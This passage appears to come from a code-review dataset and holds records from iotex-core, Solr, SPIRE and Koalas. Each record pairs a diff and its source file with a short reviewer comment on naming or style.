getUnproductiveDelegate GetUnproductiveDelegate,
electionCommittee committee.Committee,
stakingV2 *staking.Protocol,
getBlockTimeFunc GetBlockTime,
productivity Productivity,
getBlockHash evm.GetBlockHash,
) (Protocol, error) {
genesisConfig := cfg.Genesis
if cfg.Consensus.Scheme != config.RollDPoSScheme {
return nil, nil
}
switch genesisConfig.PollMode {
case _modeLifeLong:
delegates := genesisConfig.Delegates
if uint64(len(delegates)) < genesisConfig.NumDelegates {
return nil, errors.New("invalid delegate address in genesis block")
}
return NewLifeLongDelegatesProtocol(delegates), nil
case _modeGovernanceMix:
if !genesisConfig.EnableGravityChainVoting || electionCommittee == nil {
return nil, errors.New("gravity chain voting is not enabled")
}
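		// Build the slasher first; it holds the productivity/kick-out settings and is
		// shared with the governance protocol constructed below.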
slasher, err := NewSlasher(
&genesisConfig,
productivity,
candidatesByHeight,
getCandidates,
getkickoutList,
getUnproductiveDelegate,
candidateIndexer,
genesisConfig.NumCandidateDelegates,
genesisConfig.NumDelegates,
genesisConfig.ProductivityThreshold,
genesisConfig.KickoutEpochPeriod,
genesisConfig.UnproductiveDelegateMaxCacheSize,
genesisConfig.KickoutIntensityRate)
if err != nil {
return nil, err
}
governance, err := NewGovernanceChainCommitteeProtocol(
candidateIndexer,
electionCommittee,
genesisConfig.GravityChainStartHeight,
getBlockTimeFunc,
cfg.Chain.PollInitialCandidatesInterval,
slasher,
)
if err != nil {
return nil, err
}
scoreThreshold, ok := new(big.Int).SetString(cfg.Genesis.ScoreThreshold, 10)
if !ok {
return nil, errors.Errorf("failed to parse score threshold %s", cfg.Genesis.ScoreThreshold)
}
return NewStakingCommittee(
electionCommittee,
governance,
readContract,
cfg.Genesis.NativeStakingContractAddress,
cfg.Genesis.NativeStakingContractCode,
scoreThreshold,
)
case _modeNative:
// TODO
return nil, errors.New("not implemented")
case _modeNativeMix:
// TODO
return nil, errors.New("not implemented")
case _modeConsortium:
return NewConsortiumCommittee(candidateIndexer, readContract, getBlockHash)
default:
return nil, errors.Errorf("unsupported poll mode %s", genesisConfig.PollMode)
}
}
| 1 | 21,455 | nit: rename to nativeStk? proto might lead to think protobuf | iotexproject-iotex-core | go |
@@ -28,6 +28,9 @@ import org.apache.solr.common.util.StrUtils;
public interface ShardParams {
/** the shards to use (distributed configuration) */
String SHARDS = "shards";
+
+ /** UUID of the query */
+ String QUERY_ID = "queryID";
/** per-shard start and rows */
String SHARDS_ROWS = "shards.rows"; | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.solr.common.params;
import org.apache.solr.common.util.StrUtils;
/**
* Parameters used for distributed search.
*
* When adding a new parameter here, please also add the corresponding
* one-line test case in the ShardParamsTest class.
*
*/
public interface ShardParams {
/** the shards to use (distributed configuration) */
String SHARDS = "shards";
/** per-shard start and rows */
String SHARDS_ROWS = "shards.rows";
String SHARDS_START = "shards.start";
/** IDs of the shard documents */
String IDS = "ids";
/** whether the request goes to a shard */
String IS_SHARD = "isShard";
/** The requested URL for this shard */
String SHARD_URL = "shard.url";
/** The requested shard name */
String SHARD_NAME = "shard.name";
/** The Request Handler for shard requests */
String SHARDS_QT = "shards.qt";
/** Request detailed match info for each shard (true/false) */
String SHARDS_INFO = "shards.info";
/** Should things fail if there is an error? (true/false/{@value #REQUIRE_ZK_CONNECTED}) */
String SHARDS_TOLERANT = "shards.tolerant";
/** query purpose for shard requests */
String SHARDS_PURPOSE = "shards.purpose";
/** Shards sorting rules */
String SHARDS_PREFERENCE = "shards.preference";
/** Replica type sort rule */
String SHARDS_PREFERENCE_REPLICA_TYPE = "replica.type";
/** Replica location sort rule */
String SHARDS_PREFERENCE_REPLICA_LOCATION = "replica.location";
/** Node with same system property sort rule */
String SHARDS_PREFERENCE_NODE_WITH_SAME_SYSPROP = "node.sysprop";
/** Replica base/fallback sort rule */
String SHARDS_PREFERENCE_REPLICA_BASE = "replica.base";
/** Value denoting local replicas */
String REPLICA_LOCAL = "local";
/** Value denoting randomized replica sort */
String REPLICA_RANDOM = "random";
/** Value denoting stable replica sort */
String REPLICA_STABLE = "stable";
/** configure dividend param for stable replica sort */
String ROUTING_DIVIDEND = "dividend";
/** configure hash param for stable replica sort */
String ROUTING_HASH = "hash";
String _ROUTE_ = "_route_";
/** Force a single-pass distributed query? (true/false) */
String DISTRIB_SINGLE_PASS = "distrib.singlePass";
/**
* Throw an error from search requests when the {@value #SHARDS_TOLERANT} param
* has this value and ZooKeeper is not connected.
*
* @see #getShardsTolerantAsBool(SolrParams)
*/
String REQUIRE_ZK_CONNECTED = "requireZkConnected";
/**
* Parse the {@value #SHARDS_TOLERANT} param from <code>params</code> as a boolean;
* accepts {@value #REQUIRE_ZK_CONNECTED} as a valid value indicating <code>false</code>.
*
* By default, returns <code>false</code> when {@value #SHARDS_TOLERANT} is not set
* in <code>params</code>.
*/
static boolean getShardsTolerantAsBool(SolrParams params) {
String shardsTolerantValue = params.get(SHARDS_TOLERANT);
if (null == shardsTolerantValue || shardsTolerantValue.equals(REQUIRE_ZK_CONNECTED)) {
return false;
} else {
return StrUtils.parseBool(shardsTolerantValue); // throw an exception if non-boolean
}
}
}
| 1 | 40,483 | Why not `queryUUID` (and reference the same constant as in other places)? | apache-lucene-solr | java |
@@ -36,9 +36,9 @@ import (
)
const (
- invalidTrustDomainAttestedNode = "An attested node with trust domain '%v' has been detected, " +
+ invalidTrustDomainAttestedNode = "an attested node with trust domain '%v' has been detected, " +
"which does not match the configured trust domain of '%v'. Agents may need to be reconfigured to use new trust domain"
- invalidTrustDomainRegistrationEntry = "A registration entry with trust domain '%v' has been detected, " +
+ invalidTrustDomainRegistrationEntry = "a registration entry with trust domain '%v' has been detected, " +
"which does not match the configured trust domain of '%v'. If you want to change the trust domain, " +
"please delete all existing registration entries"
invalidSpiffeIDRegistrationEntry = "registration entry with id %v is malformed because invalid SPIFFE ID: %v" | 1 | package server
import (
"context"
"errors"
"fmt"
"net/http"
_ "net/http/pprof" //nolint: gosec // import registers routes on DefaultServeMux
"net/url"
"os"
"runtime"
"sync"
"github.com/andres-erbsen/clock"
bundlev1 "github.com/spiffe/spire-api-sdk/proto/spire/api/server/bundle/v1"
server_util "github.com/spiffe/spire/cmd/spire-server/util"
"github.com/spiffe/spire/pkg/common/health"
"github.com/spiffe/spire/pkg/common/hostservice/metricsservice"
"github.com/spiffe/spire/pkg/common/profiling"
"github.com/spiffe/spire/pkg/common/telemetry"
"github.com/spiffe/spire/pkg/common/uptime"
"github.com/spiffe/spire/pkg/common/util"
bundle_client "github.com/spiffe/spire/pkg/server/bundle/client"
"github.com/spiffe/spire/pkg/server/ca"
"github.com/spiffe/spire/pkg/server/catalog"
"github.com/spiffe/spire/pkg/server/endpoints"
"github.com/spiffe/spire/pkg/server/hostservice/agentstore"
"github.com/spiffe/spire/pkg/server/hostservice/identityprovider"
"github.com/spiffe/spire/pkg/server/plugin/datastore"
"github.com/spiffe/spire/pkg/server/registration"
"github.com/spiffe/spire/pkg/server/svid"
metricsv0 "github.com/spiffe/spire/proto/spire/hostservice/common/metrics/v0"
agentstorev0 "github.com/spiffe/spire/proto/spire/hostservice/server/agentstore/v0"
identityproviderv0 "github.com/spiffe/spire/proto/spire/hostservice/server/identityprovider/v0"
"google.golang.org/grpc"
)
const (
invalidTrustDomainAttestedNode = "An attested node with trust domain '%v' has been detected, " +
"which does not match the configured trust domain of '%v'. Agents may need to be reconfigured to use new trust domain"
invalidTrustDomainRegistrationEntry = "A registration entry with trust domain '%v' has been detected, " +
"which does not match the configured trust domain of '%v'. If you want to change the trust domain, " +
"please delete all existing registration entries"
invalidSpiffeIDRegistrationEntry = "registration entry with id %v is malformed because invalid SPIFFE ID: %v"
invalidSpiffeIDAttestedNode = "could not parse SPIFFE ID, from attested node"
pageSize = 1
)
type Server struct {
config Config
}
// Run the server
// This method initializes the server, including its plugins,
// and then blocks until it's shut down or an error is encountered.
func (s *Server) Run(ctx context.Context) error {
if err := s.run(ctx); err != nil {
s.config.Log.WithError(err).Error("Fatal run error")
return err
}
return nil
}
func (s *Server) run(ctx context.Context) (err error) {
// create the data directory if needed
s.config.Log.Infof("Data directory: %q", s.config.DataDir)
if err := os.MkdirAll(s.config.DataDir, 0755); err != nil {
return err
}
if s.config.ProfilingEnabled {
stopProfiling := s.setupProfiling(ctx)
defer stopProfiling()
}
metrics, err := telemetry.NewMetrics(&telemetry.MetricsConfig{
FileConfig: s.config.Telemetry,
Logger: s.config.Log.WithField(telemetry.SubsystemName, telemetry.Telemetry),
ServiceName: telemetry.SpireServer,
})
if err != nil {
return err
}
metricsService := metricsservice.New(metricsservice.Config{
Metrics: metrics,
})
telemetry.EmitVersion(metrics)
uptime.ReportMetrics(ctx, metrics)
// Create the identity provider host service. It will not be functional
// until the call to SetDeps() below. There is some tricky initialization
// stuff going on since the identity provider host service requires plugins
// to do its job. RPC's from plugins to the identity provider before
// SetDeps() has been called will fail with a PreCondition status.
identityProvider := identityprovider.New(identityprovider.Config{
TrustDomainID: s.config.TrustDomain.IDString(),
})
// Create the agent store host service. It will not be functional
// until the call to SetDeps() below.
agentStore := agentstore.New()
cat, err := s.loadCatalog(ctx, metrics, identityProvider, agentStore, metricsService)
if err != nil {
return err
}
defer cat.Close()
healthChecker := health.NewChecker(s.config.HealthChecks, s.config.Log)
s.config.Log.Info("Plugins started")
err = s.validateTrustDomain(ctx, cat.GetDataStore())
if err != nil {
return err
}
serverCA := s.newCA(metrics, healthChecker)
// CA manager needs to be initialized before the rotator, otherwise the
// server CA plugin won't be able to sign CSRs
caManager, err := s.newCAManager(ctx, cat, metrics, serverCA, healthChecker)
if err != nil {
return err
}
svidRotator, err := s.newSVIDRotator(ctx, serverCA, metrics)
if err != nil {
return err
}
endpointsServer, err := s.newEndpointsServer(ctx, cat, svidRotator, serverCA, metrics, caManager)
if err != nil {
return err
}
// Set the identity provider dependencies
if err := identityProvider.SetDeps(identityprovider.Deps{
DataStore: cat.GetDataStore(),
X509IdentityFetcher: identityprovider.X509IdentityFetcherFunc(func(context.Context) (*identityprovider.X509Identity, error) {
// Return the server identity itself
state := svidRotator.State()
return &identityprovider.X509Identity{
CertChain: state.SVID,
PrivateKey: state.Key,
}, nil
}),
}); err != nil {
return fmt.Errorf("failed setting IdentityProvider deps: %v", err)
}
// Set the agent store dependencies
if err := agentStore.SetDeps(agentstore.Deps{
DataStore: cat.GetDataStore(),
}); err != nil {
return fmt.Errorf("failed setting AgentStore deps: %v", err)
}
bundleManager := s.newBundleManager(cat, metrics)
registrationManager := s.newRegistrationManager(cat, metrics)
if err := healthChecker.AddCheck("server", s); err != nil {
return fmt.Errorf("failed adding healthcheck: %v", err)
}
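	// Start all long-lived components; RunTasks blocks until the context is
	// canceled or one of the tasks returns an error.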
err = util.RunTasks(ctx,
caManager.Run,
svidRotator.Run,
endpointsServer.ListenAndServe,
metrics.ListenAndServe,
bundleManager.Run,
registrationManager.Run,
util.SerialRun(s.waitForTestDial, healthChecker.ListenAndServe),
scanForBadEntries(s.config.Log, metrics, cat.GetDataStore()),
)
if err == context.Canceled {
err = nil
}
return err
}
func (s *Server) setupProfiling(ctx context.Context) (stop func()) {
ctx, cancel := context.WithCancel(ctx)
var wg sync.WaitGroup
if runtime.MemProfileRate == 0 {
s.config.Log.Warn("Memory profiles are disabled")
}
if s.config.ProfilingPort > 0 {
grpc.EnableTracing = true
server := http.Server{
Addr: fmt.Sprintf("localhost:%d", s.config.ProfilingPort),
Handler: http.DefaultServeMux,
}
// kick off a goroutine to serve the pprof endpoints and one to
// gracefully shut down the server when profiling is being torn down
wg.Add(1)
go func() {
defer wg.Done()
if err := server.ListenAndServe(); err != nil {
s.config.Log.WithError(err).Warn("Unable to serve profiling server")
}
}()
wg.Add(1)
go func() {
defer wg.Done()
<-ctx.Done()
if err := server.Shutdown(ctx); err != nil {
s.config.Log.WithError(err).Warn("Unable to shutdown the server cleanly")
}
}()
}
if s.config.ProfilingFreq > 0 {
c := &profiling.Config{
Tag: "server",
Frequency: s.config.ProfilingFreq,
DebugLevel: 0,
RunGCBeforeHeapProfile: true,
Profiles: s.config.ProfilingNames,
}
wg.Add(1)
go func() {
defer wg.Done()
if err := profiling.Run(ctx, c); err != nil {
s.config.Log.WithError(err).Warn("Failed to run profiling")
}
}()
}
return func() {
cancel()
wg.Wait()
}
}
func (s *Server) loadCatalog(ctx context.Context, metrics telemetry.Metrics, identityProvider identityproviderv0.IdentityProviderServer, agentStore agentstorev0.AgentStoreServer,
metricsService metricsv0.MetricsServiceServer) (*catalog.Repository, error) {
return catalog.Load(ctx, catalog.Config{
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.Catalog),
GlobalConfig: &catalog.GlobalConfig{
TrustDomain: s.config.TrustDomain.String(),
},
PluginConfig: s.config.PluginConfigs,
Metrics: metrics,
IdentityProvider: identityProvider,
AgentStore: agentStore,
MetricsService: metricsService,
})
}
func (s *Server) newCA(metrics telemetry.Metrics, healthChecker health.Checker) *ca.CA {
return ca.NewCA(ca.Config{
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.CA),
Metrics: metrics,
X509SVIDTTL: s.config.SVIDTTL,
JWTIssuer: s.config.JWTIssuer,
TrustDomain: s.config.TrustDomain,
CASubject: s.config.CASubject,
HealthChecker: healthChecker,
})
}
func (s *Server) newCAManager(ctx context.Context, cat catalog.Catalog, metrics telemetry.Metrics, serverCA *ca.CA, healthChecker health.Checker) (*ca.Manager, error) {
caManager := ca.NewManager(ca.ManagerConfig{
CA: serverCA,
Catalog: cat,
TrustDomain: s.config.TrustDomain,
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.CAManager),
Metrics: metrics,
CATTL: s.config.CATTL,
CASubject: s.config.CASubject,
Dir: s.config.DataDir,
X509CAKeyType: s.config.CAKeyType,
JWTKeyType: s.config.JWTKeyType,
HealthChecker: healthChecker,
})
if err := caManager.Initialize(ctx); err != nil {
return nil, err
}
return caManager, nil
}
func (s *Server) newRegistrationManager(cat catalog.Catalog, metrics telemetry.Metrics) *registration.Manager {
registrationManager := registration.NewManager(registration.ManagerConfig{
DataStore: cat.GetDataStore(),
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.RegistrationManager),
Metrics: metrics,
})
return registrationManager
}
func (s *Server) newSVIDRotator(ctx context.Context, serverCA ca.ServerCA, metrics telemetry.Metrics) (*svid.Rotator, error) {
svidRotator := svid.NewRotator(&svid.RotatorConfig{
ServerCA: serverCA,
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.SVIDRotator),
Metrics: metrics,
TrustDomain: s.config.TrustDomain,
})
if err := svidRotator.Initialize(ctx); err != nil {
return nil, err
}
return svidRotator, nil
}
func (s *Server) newEndpointsServer(ctx context.Context, catalog catalog.Catalog, svidObserver svid.Observer, serverCA ca.ServerCA, metrics telemetry.Metrics, caManager *ca.Manager) (endpoints.Server, error) {
config := endpoints.Config{
TCPAddr: s.config.BindAddress,
UDSAddr: s.config.BindUDSAddress,
SVIDObserver: svidObserver,
TrustDomain: s.config.TrustDomain,
Catalog: catalog,
ServerCA: serverCA,
Log: s.config.Log.WithField(telemetry.SubsystemName, telemetry.Endpoints),
Metrics: metrics,
Manager: caManager,
RateLimit: s.config.RateLimit,
Uptime: uptime.Uptime,
Clock: clock.New(),
CacheReloadInterval: s.config.CacheReloadInterval,
}
if s.config.Federation.BundleEndpoint != nil {
config.BundleEndpoint.Address = s.config.Federation.BundleEndpoint.Address
config.BundleEndpoint.ACME = s.config.Federation.BundleEndpoint.ACME
}
return endpoints.New(ctx, config)
}
func (s *Server) newBundleManager(cat catalog.Catalog, metrics telemetry.Metrics) *bundle_client.Manager {
return bundle_client.NewManager(bundle_client.ManagerConfig{
Log: s.config.Log.WithField(telemetry.SubsystemName, "bundle_client"),
Metrics: metrics,
DataStore: cat.GetDataStore(),
TrustDomains: s.config.Federation.FederatesWith,
})
}
func (s *Server) validateTrustDomain(ctx context.Context, ds datastore.DataStore) error {
trustDomain := s.config.TrustDomain.String()
// Get only first page with a single element
fetchResponse, err := ds.ListRegistrationEntries(ctx, &datastore.ListRegistrationEntriesRequest{
Pagination: &datastore.Pagination{
Token: "",
PageSize: pageSize,
}})
if err != nil {
return err
}
for _, entry := range fetchResponse.Entries {
id, err := url.Parse(entry.SpiffeId)
if err != nil {
return fmt.Errorf(invalidSpiffeIDRegistrationEntry, entry.EntryId, err)
}
if id.Host != trustDomain {
return fmt.Errorf(invalidTrustDomainRegistrationEntry, id.Host, trustDomain)
}
}
// Get only first page with a single element
nodesResponse, err := ds.ListAttestedNodes(ctx, &datastore.ListAttestedNodesRequest{
Pagination: &datastore.Pagination{
Token: "",
PageSize: pageSize,
}})
if err != nil {
return err
}
for _, node := range nodesResponse.Nodes {
id, err := url.Parse(node.SpiffeId)
if err != nil {
s.config.Log.WithError(err).WithField(telemetry.SPIFFEID, node.SpiffeId).Warn(invalidSpiffeIDAttestedNode)
continue
}
if id.Host != trustDomain {
msg := fmt.Sprintf(invalidTrustDomainAttestedNode, id.Host, trustDomain)
s.config.Log.Warn(msg)
}
}
return nil
}
// waitForTestDial calls health.WaitForTestDial to wait for a connection to the
// SPIRE Server API socket. This function always returns nil, even if
// health.WaitForTestDial exited due to a timeout.
func (s *Server) waitForTestDial(ctx context.Context) error {
health.WaitForTestDial(ctx, s.config.BindUDSAddress)
return nil
}
// CheckHealth is used as a top-level health check for the Server.
func (s *Server) CheckHealth() health.State {
err := s.tryGetBundle()
// The API is served only after the server CA has been
// signed by upstream. Hence, both live and ready checks
// are determined by whether the bundles are received or not.
// TODO: Better live check for server.
return health.State{
Ready: err == nil,
Live: err == nil,
ReadyDetails: serverHealthDetails{
GetBundleErr: errString(err),
},
LiveDetails: serverHealthDetails{
GetBundleErr: errString(err),
},
}
}
func (s *Server) tryGetBundle() error {
client, err := server_util.NewServerClient(s.config.BindUDSAddress.Name)
if err != nil {
return errors.New("cannot create registration client")
}
defer client.Release()
bundleClient := client.NewBundleClient()
// Currently using the ability to fetch a bundle as the health check. This
// **could** be problematic if the Upstream CA signing process is lengthy.
// As currently coded however, the API isn't served until after
// the server CA has been signed by upstream.
if _, err := bundleClient.GetBundle(context.Background(), &bundlev1.GetBundleRequest{}); err != nil {
return errors.New("unable to fetch bundle")
}
return nil
}
type serverHealthDetails struct {
GetBundleErr string `json:"get_bundle_err,omitempty"`
}
func errString(err error) string {
if err != nil {
return err.Error()
}
return ""
}
| 1 | 16,511 | This is also used to log, of which our convention is leading uppercase... | spiffe-spire | go |
@@ -131,7 +131,7 @@ class ReusedSQLTestCase(unittest.TestCase, SQLTestUtils):
# Please see databricks/koalas/conftest.py.
pass
- def assertPandasEqual(self, left, right):
+ def assertPandasEqual(self, left, right, less_precise=False):
if isinstance(left, pd.DataFrame) and isinstance(right, pd.DataFrame):
try:
pd.util.testing.assert_frame_equal( | 1 | #
# Copyright (C) 2019 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import shutil
import tempfile
import unittest
import warnings
from contextlib import contextmanager
import pandas as pd
from databricks import koalas as ks
from databricks.koalas.frame import DataFrame
from databricks.koalas.indexes import Index
from databricks.koalas.series import Series
from databricks.koalas.utils import name_like_string, default_session
class SQLTestUtils(object):
"""
    This util assumes that the instance of this class has a 'spark' attribute holding a Spark
    session. It is usually used with the 'ReusedSQLTestCase' class, but can be used directly if
    you are sure the implementation of the class has a 'spark' attribute.
"""
@contextmanager
def sql_conf(self, pairs):
"""
A convenient context manager to test some configuration specific logic. This sets
`value` to the configuration `key` and then restores it back when it exits.
"""
assert isinstance(pairs, dict), "pairs should be a dictionary."
assert hasattr(self, "spark"), "it should have 'spark' attribute, having a spark session."
keys = pairs.keys()
new_values = pairs.values()
old_values = [self.spark.conf.get(key, None) for key in keys]
for key, new_value in zip(keys, new_values):
self.spark.conf.set(key, new_value)
try:
yield
finally:
for key, old_value in zip(keys, old_values):
if old_value is None:
self.spark.conf.unset(key)
else:
self.spark.conf.set(key, old_value)
@contextmanager
def database(self, *databases):
"""
        A convenient context manager to test with some specific databases. This drops the given
        databases if they exist and sets the current database to "default" when it exits.
"""
assert hasattr(self, "spark"), "it should have 'spark' attribute, having a spark session."
try:
yield
finally:
for db in databases:
self.spark.sql("DROP DATABASE IF EXISTS %s CASCADE" % db)
self.spark.catalog.setCurrentDatabase("default")
@contextmanager
def table(self, *tables):
"""
        A convenient context manager to test with some specific tables. This drops the given tables
        if they exist.
"""
assert hasattr(self, "spark"), "it should have 'spark' attribute, having a spark session."
try:
yield
finally:
for t in tables:
self.spark.sql("DROP TABLE IF EXISTS %s" % t)
@contextmanager
def tempView(self, *views):
"""
        A convenient context manager to test with some specific views. This drops the given views
        if they exist.
"""
assert hasattr(self, "spark"), "it should have 'spark' attribute, having a spark session."
try:
yield
finally:
for v in views:
self.spark.catalog.dropTempView(v)
@contextmanager
def function(self, *functions):
"""
        A convenient context manager to test with some specific functions. This drops the given
        functions if they exist.
"""
assert hasattr(self, "spark"), "it should have 'spark' attribute, having a spark session."
try:
yield
finally:
for f in functions:
self.spark.sql("DROP FUNCTION IF EXISTS %s" % f)
class ReusedSQLTestCase(unittest.TestCase, SQLTestUtils):
@classmethod
def setUpClass(cls):
cls.spark = default_session()
cls.spark.conf.set("spark.sql.execution.arrow.enabled", True)
@classmethod
def tearDownClass(cls):
# We don't stop Spark session to reuse across all tests.
# The Spark session will be started and stopped at PyTest session level.
# Please see databricks/koalas/conftest.py.
pass
def assertPandasEqual(self, left, right):
if isinstance(left, pd.DataFrame) and isinstance(right, pd.DataFrame):
try:
pd.util.testing.assert_frame_equal(
left,
right,
check_index_type=("equiv" if len(left.index) > 0 else False),
check_column_type=("equiv" if len(left.columns) > 0 else False),
check_exact=True,
)
except AssertionError as e:
msg = (
str(e)
+ "\n\nLeft:\n%s\n%s" % (left, left.dtypes)
+ "\n\nRight:\n%s\n%s" % (right, right.dtypes)
)
raise AssertionError(msg) from e
elif isinstance(left, pd.Series) and isinstance(right, pd.Series):
try:
pd.util.testing.assert_series_equal(
left,
right,
check_index_type=("equiv" if len(left.index) > 0 else False),
check_exact=True,
)
except AssertionError as e:
msg = (
str(e)
+ "\n\nLeft:\n%s\n%s" % (left, left.dtype)
+ "\n\nRight:\n%s\n%s" % (right, right.dtype)
)
raise AssertionError(msg) from e
elif isinstance(left, pd.Index) and isinstance(right, pd.Index):
try:
pd.util.testing.assert_index_equal(left, right, check_exact=True)
except AssertionError as e:
msg = (
str(e)
+ "\n\nLeft:\n%s\n%s" % (left, left.dtype)
+ "\n\nRight:\n%s\n%s" % (right, right.dtype)
)
raise AssertionError(msg) from e
else:
raise ValueError("Unexpected values: (%s, %s)" % (left, right))
def assertPandasAlmostEqual(self, left, right):
"""
        This function checks if the given pandas objects are approximately the same,
which means the conditions below:
- Both objects are nullable
- Compare floats rounding to the number of decimal places, 7 after
dropping missing values (NaN, NaT, None)
"""
if isinstance(left, pd.DataFrame) and isinstance(right, pd.DataFrame):
msg = (
"DataFrames are not almost equal: "
+ "\n\nLeft:\n%s\n%s" % (left, left.dtypes)
+ "\n\nRight:\n%s\n%s" % (right, right.dtypes)
)
self.assertEqual(left.shape, right.shape, msg=msg)
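            # Compare column by column: names first, then null positions, then the
            # remaining non-null values via assertAlmostEqual.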
for lcol, rcol in zip(left.columns, right.columns):
self.assertEqual(name_like_string(lcol), name_like_string(rcol), msg=msg)
for lnull, rnull in zip(left[lcol].isnull(), right[rcol].isnull()):
self.assertEqual(lnull, rnull, msg=msg)
for lval, rval in zip(left[lcol].dropna(), right[rcol].dropna()):
self.assertAlmostEqual(lval, rval, msg=msg)
        elif isinstance(left, pd.Series) and isinstance(right, pd.Series):
msg = (
"Series are not almost equal: "
+ "\n\nLeft:\n%s\n%s" % (left, left.dtype)
+ "\n\nRight:\n%s\n%s" % (right, right.dtype)
)
self.assertEqual(str(left.name), str(right.name), msg=msg)
self.assertEqual(len(left), len(right), msg=msg)
for lnull, rnull in zip(left.isnull(), right.isnull()):
self.assertEqual(lnull, rnull, msg=msg)
for lval, rval in zip(left.dropna(), right.dropna()):
self.assertAlmostEqual(lval, rval, msg=msg)
        elif isinstance(left, pd.MultiIndex) and isinstance(right, pd.MultiIndex):
msg = (
"MultiIndices are not almost equal: "
+ "\n\nLeft:\n%s\n%s" % (left, left.dtype)
+ "\n\nRight:\n%s\n%s" % (right, right.dtype)
)
self.assertEqual(len(left), len(right), msg=msg)
for lval, rval in zip(left, right):
self.assertAlmostEqual(lval, rval, msg=msg)
        elif isinstance(left, pd.Index) and isinstance(right, pd.Index):
msg = (
"Indices are not almost equal: "
+ "\n\nLeft:\n%s\n%s" % (left, left.dtype)
+ "\n\nRight:\n%s\n%s" % (right, right.dtype)
)
self.assertEqual(len(left), len(right), msg=msg)
for lnull, rnull in zip(left.isnull(), right.isnull()):
self.assertEqual(lnull, rnull, msg=msg)
for lval, rval in zip(left.dropna(), right.dropna()):
self.assertAlmostEqual(lval, rval, msg=msg)
else:
raise ValueError("Unexpected values: (%s, %s)" % (left, right))
def assert_eq(self, left, right, almost=False):
"""
Asserts if two arbitrary objects are equal or not. If given objects are Koalas DataFrame
or Series, they are converted into pandas' and compared.
:param left: object to compare
:param right: object to compare
:param almost: if this is enabled, the comparison is delegated to `unittest`'s
`assertAlmostEqual`. See its documentation for more details.
"""
lpdf = self._to_pandas(left)
rpdf = self._to_pandas(right)
if isinstance(lpdf, (pd.DataFrame, pd.Series, pd.Index)):
if almost:
self.assertPandasAlmostEqual(lpdf, rpdf)
else:
self.assertPandasEqual(lpdf, rpdf)
else:
if almost:
self.assertAlmostEqual(lpdf, rpdf)
else:
self.assertEqual(lpdf, rpdf)
def assert_array_eq(self, left, right):
self.assertTrue((left == right).all())
def assert_list_eq(self, left, right):
for litem, ritem in zip(left, right):
self.assert_eq(litem, ritem)
@staticmethod
def _to_pandas(df):
if isinstance(df, (DataFrame, Series, Index)):
return df.toPandas()
else:
return df
class TestUtils(object):
@contextmanager
def temp_dir(self):
tmp = tempfile.mkdtemp()
try:
yield tmp
finally:
shutil.rmtree(tmp)
@contextmanager
def temp_file(self):
with self.temp_dir() as tmp:
yield tempfile.mktemp(dir=tmp)
class ComparisonTestBase(ReusedSQLTestCase):
@property
def kdf(self):
return ks.from_pandas(self.pdf)
@property
def pdf(self):
return self.kdf.toPandas()
def compare_both(f=None, almost=True):
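    # Supports both bare-decorator usage (@compare_both) and parametrized usage,
    # e.g. @compare_both(almost=False) or @compare_both(False).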
if f is None:
return functools.partial(compare_both, almost=almost)
elif isinstance(f, bool):
return functools.partial(compare_both, almost=f)
@functools.wraps(f)
def wrapped(self):
if almost:
compare = self.assertPandasAlmostEqual
else:
compare = self.assertPandasEqual
for result_pandas, result_spark in zip(f(self, self.pdf), f(self, self.kdf)):
compare(result_pandas, result_spark.toPandas())
return wrapped
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Notes
-----
Replicated from pandas._testing.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False): # doctest: +SKIP
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning): # doctest: +SKIP
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(actual_warning.category, expected_warning):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. ",
"File where warning is raised: {} != ".format(actual_warning.filename),
"{}. Warning message: {}".format(caller.filename, actual_warning.message),
)
